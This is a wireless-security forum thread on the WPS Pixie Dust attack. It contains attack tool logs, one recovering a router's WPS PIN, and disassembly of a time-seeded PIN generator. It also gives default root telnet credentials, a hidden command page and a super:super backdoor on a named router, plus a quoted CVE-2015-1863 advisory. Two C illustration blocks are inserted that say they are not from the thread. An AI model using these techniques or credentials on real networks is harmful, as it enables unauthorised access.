[P] PKR: 80:d4:14:fc:c5:52:20:b5:15:b0:e4:4d:d4:ed:39:aa:aa:04:7c:b5:b4:c7:a7:68:f3:53:5a:d6:1b:40:74:66:45:88:19:ab:32:54:ff:62:c7:73:3e:f8:20:1e:39:7b:98:2e:79:2a:6f:2c:c0:f5:2c:11:af:8b:fc:ed:5b:09:03:bb:05:15:c3:b4:2a:1e:ec:8a:11:ee:ef:45:b0:8f:4d:47:5c:76:ed:8f:01:c5:4f:38:2e:58:25:54:df:af:9a:c7:9e:d4:1f:d5:ae:9b:47:87:7e:91:03:74:62:52:b7:c7:b8:30:27:a5:77:8f:42:f4:1c:d7:8c:40:71:ce:41:ae:c5:92:d4:7f:90:9b:ee:7f:f7:6f:c6:8c:74:c6:8e:aa:50:65:b4:7f:42:ce:e3:76:54:fb:cc:1d:c9:93:2a:96:15:76:4b:86:9a:18:8f:f8:17:48:4f:5c:d6:37:29:be:e1:4e:95:91:4b:21:fa:2c:2c:73:57:88:f4:0b
[P] AuthKey: c5:d7:f1:9d:c1:ae:3a:ff:ba:91:7e:74:e3:22:ab:d2:1c:4e:fe:d8:e4:77:07:76:2a:14:92:e5:e1:67:99:c9
[+] Sending M2 message
[P] E-Hash1: 23:21:cc:28:94:70:12:dc:15:1b:cc:92:55:18:bf:5f:7b:8a:4e:cd:34:a8:2a:21:03:57:ef:3d:a3:4b:4f:9b
[P] E-Hash2: c4:52:d0:f5:c8:46:cf:d4:4d:bd:f1:49:2e:ea:a2:7a:c9:47:d5:4f:5c:de:f2:67:19:74:40:a0:87:0b:e8:cf
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 1 s
[Pixie-Dust]
Code:
Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 87:22:86:c8:e7:13:9b:77:7d:08:0b:74:85:2b:c0:e4
[P] PKE: a5:e7:ee:d7:ae:0b:3c:c4:4d:d8:fe:d1:91:b1:a6:88:68:dc:08:af:e7:19:70:7e:b3:4e:56:1b:d7:06:30:6a:92:a6:c2:6a:2f:ad:1d:0b:c0:fb:73:8d:63:5c:33:8a:8d:b0:01:70:c4:e0:c5:6e:fb:33:85:ef:1a:e6:1e:7d:e2:77:70:bc:a0:9a:eb:05:d5:bc:12:ef:d7:9b:96:44:2c:8e:34:b5:57:36:e1:9f:fc:9d:c0:22:de:4d:a0:91:c4:83:d4:39:d3:fb:91:5e:0d:b1:5c:2e:bb:89:c5:d4:c8:69:ad:8a:b3:f3:57:71:ee:37:66:af:5a:a6:ec:c0:13:47:6b:2e:29:88:93:d4:0d:0e:fc:c7:a4:3f:12:53:62:e4:91:8f:60:c3:81:65:c7:9c:eb:33:47:77:7b:da:23:6f:64:e7:f5:3d:09:68:e8:a9:a1:5c:6b:7e:59:e5:06:15:c2:1a:2d:3b:f3:8e:b5:ea:f8:81:f4:74:d9:fc
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 1.0
[P] Access Point Serial Number: 14CC200000*
[+] Received M1 message
[P] PKR: 71:ad:3b:95:65:b4:e3:1e:28:da:2a:d3:98:88:5f:23:4a:07:a1:21:37:45:87:ea:e5:47:01:0a:ba:65:be:7f:52:02:b0:82:3a:b1:f0:ed:17:8f:54:3a:35:a8:8c:65:cc:53:fe:67:23:ea:81:ac:9e:15:48:55:3f:97:bd:29:41:c9:f6:b5:7d:23:b5:3e:63:fc:68:9a:8f:91:e4:a4:ff:2e:9a:12:1c:87:a6:f9:9a:f2:b9:c0:21:a7:61:c4:39:28:1d:1a:5c:e4:66:9d:14:08:9f:2c:0a:e7:c1:f8:54:f5:a8:7e:81:5f:eb:ce:74:09:f8:1d:cb:46:fc:2e:c6:29:f3:c1:93:ba:62:ee:de:54:f4:21:40:55:e8:37:bb:27:52:e7:56:dd:02:09:57:84:4b:f8:78:ed:49:f7:89:7a:23:e3:b3:52:9e:8a:6b:2a:1b:64:b5:77:fd:0b:3e:ba:17:2f:fd:1d:a9:48:d6:39:97:68:4f:fb:28:bc
[P] AuthKey: 10:91:7d:d9:5a:ab:2b:0b:b6:90:db:6e:52:50:ce:c5:8e:3e:6a:91:51:32:50:bc:9a:a1:70:16:29:b9:c9:d0
[+] Sending M2 message
[P] E-Hash1: cd:8e:34:12:12:61:ae:92:9f:ef:fd:7a:88:55:03:3f:5a:52:ad:27:7a:b4:f3:ec:08:1c:07:ab:e9:61:6d:fc
[P] E-Hash2: 6e:a2:a5:cc:2b:94:ff:d9:9e:fd:d2:d3:5a:dd:73:c0:51:40:92:a7:85:3f:cc:ff:40:ab:bf:e1:15:7c:fa:57
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 2 s
[Pixie-Dust]
AND this AP is VULNERABLE, Pixie sees true values
http://imgur.com/zlmrfjO
Code:
Trying pin 12345670.
.............................
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[+] Received M1 message
[P] PKR: ................
e:e4:84:ca:d7:97:fb:98:a9:a3:fb:ca:db:5e:d7:4d:04:b9:80
[P] AuthKey:
[+] Sending M2 message
[P] E-Hash1:
[P] E-Hash2:
[Pixie-Dust]
[Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] PSK1: 11:95:69:82:fa:31:a9:2b:2e:5d:f3:9d:02:6b:1c:f5
[Pixie-Dust][*] PSK2: 6a:e0:0a:ed:09:16:46:66:f4:ef:88:3d:4c:ed:95:ae
[Pixie-Dust] [+] WPS pin: 71632285
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]
I think this is the problem, so Pixie says not vulnerable: Realtek, Broadcom and Atheros chipsets...
I don't know, but probably.
hello
Hold on a second my friend: this thread is to speak about the pixie dust attack "theoretically", not for reporting bugs using modified reaver (you have another thread for that).
pixiewps (you have another thread to speak about it) does not "see" any value,
Quote:
"Pixie sees wrong values."
Either you enter the value manually, or you use a script, or you are using the automated reaver (that is the case)...
I suggest you post in the correct thread: Reaver modification for Pixie Dust Attack
cheers
When it's ready. I was told very soon. Kept checking back here. Or u could follow the github
I can beta also
Hi,
Got the firmware, unpacked with fmk, checked with IDA Pro.
Found this function in wscd (it's the "gen-pin" function from the .sh script), but I'm not that good at MIPS. The (in my opinion) important parts are marked; maybe someone who's familiar with MIPS can tell something about it.
Code:
LOAD:0040C4C4 la $t9, gettimeofday
LOAD:0040C4C8 move $a1, $zero
LOAD:0040C4CC jalr $t9 ; gettimeofday
LOAD:0040C4D0 addiu $a0, $sp, 0xF0+var_68
LOAD:0040C4D4 lw $gp, 0xF0+var_D8($sp)
LOAD:0040C4D8 lw $a0, 0xF0+var_68($sp)
LOAD:0040C4DC la $t9, srand
LOAD:0040C4E0 nop
LOAD:0040C4E4 jalr $t9 ; srand
LOAD:0040C4E8 nop
LOAD:0040C4EC lw $gp, 0xF0+var_D8($sp)
LOAD:0040C4F0 nop
LOAD:0040C4F4 la $t9, rand
LOAD:0040C4F8 nop
LOAD:0040C4FC jalr $t9 ; rand
LOAD:0040C500 nop
LOAD:0040C504 li $v1, 0x6B5FCA6B
LOAD:0040C50C mult $v0, $v1
LOAD:0040C510 sra $a0, $v0, 31
LOAD:0040C514 lw $gp, 0xF0+var_D8($sp)
LOAD:0040C518 nop
LOAD:0040C51C la $t9, 0x400000
LOAD:0040C520 nop
LOAD:0040C524 addiu $t9, (sub_404128 - 0x400000)
LOAD:0040C528 mfhi $v1
LOAD:0040C52C sra $v1, 22
LOAD:0040C530 subu $a1, $v1, $a0
LOAD:0040C534 sll $a0, $a1, 5
LOAD:0040C538 subu $a0, $a1
LOAD:0040C53C sll $v1, $a0, 6
LOAD:0040C540 subu $v1, $a0
LOAD:0040C544 sll $v1, 3
LOAD:0040C548 addu $v1, $a1
LOAD:0040C54C sll $a0, $v1, 2
LOAD:0040C550 addu $v1, $a0
LOAD:0040C554 sll $v1, 7
LOAD:0040C558 subu $a1, $v0, $v1
LOAD:0040C55C sll $s0, $a1, 2
LOAD:0040C560 move $a0, $a1
LOAD:0040C564 jalr $t9 ; sub_404128
LOAD:0040C568 addu $s0, $a1
LOAD:0040C56C lw $gp, 0xF0+var_D8($sp)
LOAD:0040C570 sll $s0, 1
LOAD:0040C574 addu $a0, $s0, $v0
LOAD:0040C578 la $t9, 0x400000
LOAD:0040C57C nop
LOAD:0040C580 addiu $t9, (sub_403F60 - 0x400000)
LOAD:0040C584 jalr $t9 ; sub_403F60
LOAD:0040C588 addiu $a1, $sp, 0xF0+var_D0
LOAD:0040C58C lw $gp, 0xF0+var_D8($sp)
LOAD:0040C590 addiu $a1, $sp, 0xF0+var_D0
LOAD:0040C594 la $a0, 0x440000
LOAD:0040C598 la $t9, printf
LOAD:0040C59C nop
LOAD:0040C5A0 jalr $t9 ; printf
LOAD:0040C5A4 addiu $a0, (aPinS - 0x440000) # "PIN: %s\n"
LOAD:0040C5A8 lw $gp, 0xF0+var_D8($sp)
LOAD:0040C5AC li $a0, 0xADAC
LOAD:0040C5B0 addu $a0, $s2, $a0
LOAD:0040C5B4 la $t9, strcpy
LOAD:0040C5B8 b loc_40C8C0
LOAD:0040C5BC addiu $a1, $sp, 0xF0+var_D0
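As an added illustration (not from any post in the thread and not code from the wscd binary), here is what the arithmetic in the listing above computes, written out in C: the 0x6B5FCA6B multiply is a compiler strength-reduced division by 10,000,000 and the shift/add chain multiplies the quotient back, so the rand() result is reduced modulo 10^7 before sub_404128 is called. It assumes sub_404128 is the standard WPS PIN checksum (the page does not show that routine) and takes a constructed integer in place of the rand() value.

```c
#include <stdint.h>
#include <stdio.h>

/* "li $v1, 0x6B5FCA6B": 0x6B5FCA6B == ceil(2^54 / 10^7), so the high
 * word of the 64-bit product, shifted right by 22, is v0 / 10000000. */
#define MAGIC_1E7 0x6B5FCA6BLL

/* mult / sra 31 / mfhi / sra 22 / subu: signed division of v0 by 10,000,000 */
int32_t mips_div_1e7(int32_t v0)
{
    int64_t prod = (int64_t)v0 * MAGIC_1E7;  /* mult $v0, $v1       */
    int32_t sign = v0 >> 31;                 /* sra  $a0, $v0, 31   */
    int32_t hi = (int32_t)(prod >> 32);      /* mfhi $v1            */
    int32_t q = hi >> 22;                    /* sra  $v1, 22        */
    return q - sign;                         /* subu $a1, $v1, $a0  */
}

/* The sll/subu/addu chain multiplies the quotient back by 10,000,000
 * without a mult instruction: 31 -> 1953 -> 15625 -> 78125 -> 10^7. */
uint32_t mips_times_1e7(uint32_t a1)
{
    uint32_t a0 = (a1 << 5) - a1;   /* sll $a0,$a1,5 ; subu $a0,$a1 :    31*a1 */
    uint32_t v1 = (a0 << 6) - a0;   /* sll $v1,$a0,6 ; subu $v1,$a0 :  1953*a1 */
    v1 = (v1 << 3) + a1;            /* sll $v1,3     ; addu $v1,$a1 : 15625*a1 */
    v1 = v1 + (v1 << 2);            /* sll $a0,$v1,2 ; addu $v1,$a0 : 78125*a1 */
    return v1 << 7;                 /* sll $v1,7                    :  10^7*a1 */
}

/* WPS PIN checksum digit as defined in the Wi-Fi Simple Configuration
 * spec. ASSUMPTION: sub_404128 is this routine; the listing only shows
 * its result being added to 10 * seven_digits, which is where the
 * checksum digit sits in an 8-digit WPS PIN. */
uint32_t wps_checksum(uint32_t seven_digits)
{
    uint32_t accum = 0, n = seven_digits;
    while (n) {
        accum += 3 * (n % 10); n /= 10;   /* odd positions from the right weigh 3 */
        accum += n % 10;       n /= 10;   /* even positions weigh 1 */
    }
    return (10 - accum % 10) % 10;
}

/* The listing from "mult $v0, $v1" to "addu $a0, $s0, $v0", with the
 * rand() result passed in as v0 (constructed input, no PRNG involved). */
uint32_t pin_from_rand_value(int32_t v0)
{
    int32_t q = mips_div_1e7(v0);
    uint32_t seven = (uint32_t)v0 - mips_times_1e7((uint32_t)q); /* subu $a1,$v0,$v1 : v0 mod 10^7 */
    uint32_t s0 = (seven << 2) + seven;    /* sll $s0,$a1,2 ; addu $s0,$a1 : 5*seven */
    uint32_t check = wps_checksum(seven);  /* jalr sub_404128 (assumed checksum)    */
    s0 <<= 1;                              /* sll $s0,1 : 10*seven                  */
    return s0 + check;                     /* addu $a0,$s0,$v0 : the 8-digit PIN    */
}

/* Plain-C statement of the same computation, to confirm the decoding. */
uint32_t pin_reference(int32_t v0)
{
    uint32_t seven = (uint32_t)v0 % 10000000u;
    return seven * 10u + wps_checksum(seven);
}

int main(void)
{
    /* constructed stand-ins for rand() results, including INT32_MAX */
    const int32_t samples[] = { 0, 1234567, 12345678, 2147483647 };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        uint32_t a = pin_from_rand_value(samples[i]);
        uint32_t b = pin_reference(samples[i]);
        printf("rand=%10d  mips=%08u  ref=%08u  %s\n", (int)samples[i],
               (unsigned)a, (unsigned)b, a == b ? "match" : "MISMATCH");
    }
    return 0;
}
```

The two PINs quoted earlier in the thread, 19048185 and 71632285, both satisfy wps_checksum on their first seven digits, which is consistent with sub_404128 being the checksum.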
WoW
Thank you SO MUCH someone else (I mean you, not someone else)
It is much more "readable" than what I got. ;)
I am not used to MIPS either (my poor skills in disassembling speak for themselves :P)
I will try with the tool you used, I am curious about LOAD:0040C8C0 / and checking sub_404128 / sub_403F60
The very last line you underlined is definitely like a simple "printf" that sends the value of the PIN to "stdout"
SO GREAT! ;)
First, thanks to you, we know 100% sure that building time is the string used with some randomization.
The startup.sh script was giving a strong clue: time was "generated" just before the PIN....
Another clue: we already know that time is used as a seed for the Diffie-Hellman key exchange.
Now we know: time is definitely and surely used to generate the default PIN
And it is the first build time.
That's kind of an issue if we look for a way to generate the exact default PIN, depending on the randomization, but it looks like this with the devices I saw; we might be able to guess the first digits correctly by relating them to the year of production, then the PIN respects the checksum so the seconds start on 7 digits
One hour is 3600 seconds and we would need to be at most about 15 minutes off from the exact building time to get the first half of the PIN... sorry for my English, but I guess you see what I mean...
But a little pixie flying around told me that this kind of "unsupported Realtek" would, maybe, who knows?, not be unsupported anymore for so long....
Thanks so much for the information, it is helping a lot................. ;)
DOH! How did I forget about fmk, but the last time I used it was when I was taking part in "jailbreaking" the NeoTV 300b. Looks like I've got some playing to do :-D
Hello kcdtv,
I have same kind of model you posted, an Alfa Network AIP-W525H (version 1) with firmware v2.5.2.a1, just to tell you that you can change this "permanent" WPS pin, not only that but change mac address. There's 2 ways to do it:
- you can issue commands over telnet 192.168.2.1 23 login as root and 5up as pass
- you can issue commands over web on a hidden page http://192.168.2.1/syscmd.asp
Indeed there's the wscd command that allows you to generate and assign pins with arguments like -gen-pin, generate pin code for local entitiy (it's misspelled on source code :rolleyes: ); -peer_pin, assign pin code for peer entitiy; -local_pin, assign pin code for local device
With wscd -gen-pin you can generate pins randomly, but there's other command tool named flash (like nvram) that stores values permanently over reboots:
// get WPS pin
# flash get wlan0 HW_WSC_PIN
HW_WSC_PIN="77756886"
// generate a "random" WPS pin
# flash -gen-pin
// save a new pin manually for instance 88884444 (reboot afterwards to take effect)
# flash set wlan0 HW_WSC_PIN 88884444
// change mac address permanently on wlan0
# flash set wlan0 HW_WLAN_ADDR 00c0ca1c2014
// change mac address temporarily (untill reboot) on wlan0 (to take effect do >> ifconfig wlan0 down && ifconfig wlan0 up)
# ifconfig wlan0 hw ether 00c0ca111111
About that pin generator -gen-pin, I did find stuff in some extracted files from the firmware, but I missed some stuff that I need to extract again because it was long ago, and over telnet I saw more info.
Did you have a look at the source code over this web page http://192.168.2.1/wlwps.asp?
There's a function genPinClicked() maybe it will help to look it up.
Congrats everyone for your efforts
WoW && WoW
Like someone else you are amazing too :D
That's actually one of the most exciting threads, full of amazing people, you guys rule! :cool:
YES!
Quote:
- you can issue commands over telnet 192.168.2.1 23 login as root and 5up as pass
You don't know how much I was looking for that!
'cause I noticed telnet is enabled even though there is no way to enable / disable / configure it (from the web interface with the proposed option).
But I couldn't log in.
Now I can :cool: thank you SO MUCH, that's awesome.
By the way, did you notice this permanent "super" backdoor?
With credentials super:super you can log in with administrator privileges (but not in telnet).
http://pix.toile-libre.org/upload/or...1430310175.jpg
I get a 404 error when I try to access this web page or if I try to execute a command through a POST request (but I am not used to this at all, so maybe I'm doing something wrong). Quote:
I also use version v3.2.0.2.6, different from yours. I should downgrade to check all these very interesting and fundamental elements that you bring to us.
Thanks for showing us and explaining to us all this system around PIN management (and so much more; this is tremendous information).
@kcdtv
I'm glad that I could help :o and I'm with you: great thread!
And a little update:
VULNERABLE:
Edimax
Fonera Fon 2.0n (FON 2303B)
Ralink RT 3052
Code:[P] E-Nonce: 72:a5:2f:83:81:21:32:85:04:2c:30:60:d8:cf:ab:9e
[P] PKE: 6a:b2:23:7b:37:81:58:2c:f6:a1:0c:f9:a8:ec:4c:14:70:dc:0b:70:a1:cb:1e:dc:0a:22:17:2d:b0:83:c4:bc:3a:47:b7:39:a9:63:ea:57:ff:38:ba:61:6d:2f:f7:45:96:45:80:70:1d:cf:27:1f:8a:84:52:77:e0:5c:e9:c1:72:9d:e7:8a:20:70:aa:29:e3:3d:ea:01:c5:34:c9:70:64:e3:72:c7:9a:08:b5:86:61:32:a0:7d:80:b6:e1:9c:5c:57:ab:90:4b:f5:24:50:cb:3e:31:e3:6e:d0:f9:a2:67:ab:69:71:07:9d:35:fc:97:0d:25:fa:2f:a3:d2:be:ae:eb:a2:34:9e:e5:f6:92:27:80:88:0b:fc:24:ee:b3:47:e9:35:17:a1:f5:c2:72:58:44:e6:cd:49:05:4a:2a:23:26:a3:99:8d:ae:54:bd:a7:c0:7c:3a:52:28:fc:58:a6:2b:aa:dc:b5:88:4d:b9:4f:04:41:98:82:25:2a:0a
[P] PKR: 5d:8e:b8:d7:5d:71:79:d3:c1:d5:b1:72:b4:d0:8d:85:f0:5c:13:5f:1e:8c:35:fb:83:2e:15:9a:c9:ed:0f:bf:45:48:93:77:38:2f:90:4a:4c:53:ae:4b:ee:18:4d:cc:d8:98:d8:6c:98:b2:3f:45:fe:0c:52:1b:69:75:b4:85:d0:44:1e:ca:ad:8c:57:b6:a5:13:72:5a:8b:0d:38:1a:50:21:24:71:14:7d:13:72:65:92:53:1c:de:f3:a9:03:c5:ba:65:ff:64:c8:ac:84:00:7b:c9:8b:03:61:6c:9b:39:56:4d:3a:27:a8:66:de:79:99:a2:ab:82:9c:e2:98:53:61:ba:8d:d3:9b:47:4e:d3:ff:f1:8d:e0:61:39:f6:9f:35:a2:2f:23:c4:ed:af:da:a0:77:bc:b2:db:36:21:8c:9d:14:27:96:61:22:89:37:33:09:fa:2b:1f:f0:99:9e:ea:e8:59:ad:bc:8d:d9:75:0a:db:c9:f9:43:ba:83
[P] AuthKey: 54:76:bd:c3:63:02:b2:fe:02:dd:fb:2e:db:e5:3d:2f:0f:4e:a9:e2:bc:cb:fb:d6:58:a9:47:c8:ea:56:99:34
[P] E-Hash1: 08:80:1e:79:8c:5f:27:fb:09:d3:35:cb:e3:59:67:c2:c6:48:4b:d3:0f:5a:cc:42:05:c9:80:e9:83:36:ea:c2
[P] E-Hash2: 6c:b5:bb:78:81:8d:c1:41:af:c0:32:91:8a:b6:13:64:fe:39:26:b6:76:85:ad:e7:37:d9:cc:7e:d2:c1:db:41
@kcdtv pointed out a newly documented "flaw", I guess I would call it: http://w1.fi/security/2015-1/wpa_sup...d-overflow.txt
It was something I was actually considering a few days ago, but I guess people beat me to it :P
Anyways, it looks like this may be a gateway into a bunch more information... potentially information dumps, router reboots, memory leaks, the list goes on and on. I personally don't know how to implement it. There is an option in mdk3 that does something similar, but it doesn't work for these purposes... maybe it can be modified? If you run mdk3 --fullhelp I think the command is p, but I don't recall.
If you don't want to click the link, it is just a text document:
That text is not mine, it comes verbatim from the link I posted above. I take no credit and do not mean to infringe any copyrights or screw with any legal stuff that I don't know about.Code:wpa_supplicant P2P SSID processing vulnerability
Published: April 22, 2015
Identifier: CVE-2015-1863
Latest version available from: http://w1.fi/security/2015-1/
Vulnerability
A vulnerability was found in how wpa_supplicant uses SSID information
parsed from management frames that create or update P2P peer entries
(e.g., Probe Response frame or number of P2P Public Action frames). SSID
field has valid length range of 0-32 octets. However, it is transmitted
in an element that has a 8-bit length field and potential maximum
payload length of 255 octets. wpa_supplicant was not sufficiently
verifying the payload length on one of the code paths using the SSID
received from a peer device.
This can result in copying arbitrary data from an attacker to a fixed
length buffer of 32 bytes (i.e., a possible overflow of up to 223
bytes). The SSID buffer is within struct p2p_device that is allocated
from heap. The overflow can override couple of variables in the struct,
including a pointer that gets freed. In addition about 150 bytes (the
exact length depending on architecture) can be written beyond the end of
the heap allocation.
This could result in corrupted state in heap, unexpected program
behavior due to corrupted P2P peer device information, denial of service
due to wpa_supplicant process crash, exposure of memory contents during
GO Negotiation, and potentially arbitrary code execution.
Vulnerable versions/configurations
wpa_supplicant v1.0-v2.4 with CONFIG_P2P build option enabled
Attacker (or a system controlled by the attacker) needs to be within
radio range of the vulnerable system to send a suitably constructed
management frame that triggers a P2P peer device information to be
created or updated.
The vulnerability is easiest to exploit while the device has started an
active P2P operation (e.g., has ongoing P2P_FIND or P2P_LISTEN control
interface command in progress). However, it may be possible, though
significantly more difficult, to trigger this even without any active
P2P operation in progress.
Acknowledgments
Thanks to Google security team for reporting this issue and smart
hardware research group of Alibaba security team for discovering it.
Possible mitigation steps
- Merge the following commits to wpa_supplicant and rebuild it:
P2P: Validate SSID element length before copying it (CVE-2015-1863)
This patch is available from http://w1.fi/security/2015-1/
- Update to wpa_supplicant v2.5 or newer, once available
- Disable P2P (control interface command "P2P_SET disabled 1" or
"p2p_disabled=1" in (each, if multiple interfaces used) wpa_supplicant
configuration file)
- Disable P2P from the build (remove CONFIG_P2P=y)
Anyways, I guess SSID information comes from management frames, which are unencrypted packets.... check it out here: http://www.wi-fiplanet.com/tutorials...le.php/1447501 They can't be encrypted because they "establish and maintain connections" (quoted from wi-fi planet), making it a whole lot easier for attackers. There is no encryption to break, so it should be a fairly straightforward process :D
If you are worried about this, I suggest you get an AP that supports 802.11w. Read about it here: http://www.cisco.com/c/en/us/td/docs...apter_0100.pdf
Let me know what you think about this!
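As an added illustration of the bug class the advisory above describes (my own mock-up, not wpa_supplicant's code: the field names, the struct layout and the 512-byte arena standing in for the heap object are all made up), the C below puts the unchecked copy of an SSID element into a 32-byte buffer next to the length check that the fix adds. The element's 8-bit length field allows up to 255 octets, so the unchecked path writes up to 223 bytes past the SSID buffer and over whatever fields follow it; the arena makes that clobbering observable without actually corrupting the heap. The attacker SSID element is constructed inline.

```c
/*
 * Mock-up of the CVE-2015-1863 bug class (added example; NOT wpa_supplicant
 * code).  struct p2p_device's real layout is different; here a byte arena
 * plays the heap object so the over-long copy stays inside memory we own
 * and the damage behind the 32-byte SSID field is observable.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SSID_MAX_LEN 32
#define ARENA_SIZE   512

/* Assumed layout of the pretend heap object (see lead-in). */
enum {
    OFF_SSID     = 0,                /* u8 oper_ssid[32]                     */
    OFF_SSID_LEN = SSID_MAX_LEN,     /* size_t oper_ssid_len                 */
    OFF_SENTINEL = SSID_MAX_LEN + 8  /* stands in for the pointer that is   */
                                     /* later freed, per the advisory        */
};

static const uint64_t SENTINEL = 0xDEADBEEFCAFEBABEull;

struct ie {                 /* one information element as parsed from a frame */
    uint8_t id;             /* 0 = SSID                                       */
    uint8_t len;            /* 8-bit length field: 0..255                     */
    const uint8_t *data;
};

static void arena_init(uint8_t *arena)
{
    memset(arena, 0, ARENA_SIZE);
    memcpy(arena + OFF_SENTINEL, &SENTINEL, sizeof SENTINEL);
}

static uint64_t arena_sentinel(const uint8_t *arena)
{
    uint64_t s;
    memcpy(&s, arena + OFF_SENTINEL, sizeof s);
    return s;
}

/* Vulnerable pattern: trusts the element's own length field. */
int set_ssid_unchecked(uint8_t *arena, const struct ie *ssid)
{
    memcpy(arena + OFF_SSID, ssid->data, ssid->len);   /* up to 255 bytes */
    size_t len = ssid->len;
    memcpy(arena + OFF_SSID_LEN, &len, sizeof len);
    return 0;
}

/* Fixed pattern: refuse anything longer than the buffer before copying. */
int set_ssid_checked(uint8_t *arena, const struct ie *ssid)
{
    if (ssid->len > SSID_MAX_LEN)
        return -1;                                     /* drop the peer update */
    memcpy(arena + OFF_SSID, ssid->data, ssid->len);
    size_t len = ssid->len;
    memcpy(arena + OFF_SSID_LEN, &len, sizeof len);
    return 0;
}

/* Feed a constructed 255-byte SSID element to both paths.  Returns 1 if the
   unchecked copy clobbered the sentinel while the checked one refused the
   element and left it intact. */
int demo_overflow(void)
{
    static uint8_t payload[255];
    memset(payload, 'A', sizeof payload);              /* constructed attacker SSID */
    struct ie evil = { 0, 255, payload };

    uint8_t arena[ARENA_SIZE];
    arena_init(arena);
    set_ssid_unchecked(arena, &evil);
    int clobbered = (arena_sentinel(arena) != SENTINEL);

    arena_init(arena);
    int rc = set_ssid_checked(arena, &evil);
    int intact = (rc == -1 && arena_sentinel(arena) == SENTINEL);

    return clobbered && intact;
}

/* A maximum-length legitimate SSID must still be accepted by the fixed path. */
int demo_legit(void)
{
    static const uint8_t ssid32[SSID_MAX_LEN] = "0123456789abcdef0123456789abcdef";
    struct ie ok = { 0, SSID_MAX_LEN, ssid32 };
    uint8_t arena[ARENA_SIZE];
    arena_init(arena);
    return set_ssid_checked(arena, &ok) == 0 && arena_sentinel(arena) == SENTINEL;
}

int main(void)
{
    printf("overflow demo: %s\n", demo_overflow() ? "sentinel clobbered, fix holds" : "unexpected");
    printf("32-byte SSID accepted by fixed path: %s\n", demo_legit() ? "yes" : "no");
    return 0;
}
```

The fix is the single comparison in set_ssid_checked; everything the advisory lists after "This can result in" follows from its absence, because the 8-bit length in the frame and the 32-byte buffer in the struct are bounded by different things.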
Where can I get a copy of this firmware everyone is picking apart right now? I've tried to find some Arris firmwares (as some seem to be invulnerable to pixie), but they are apparently very tightly guarded and I do not own one, or I would dump it myself. Definitely no downloads for them, but if I get my hands on one physically... different story :-D
email username @ gmail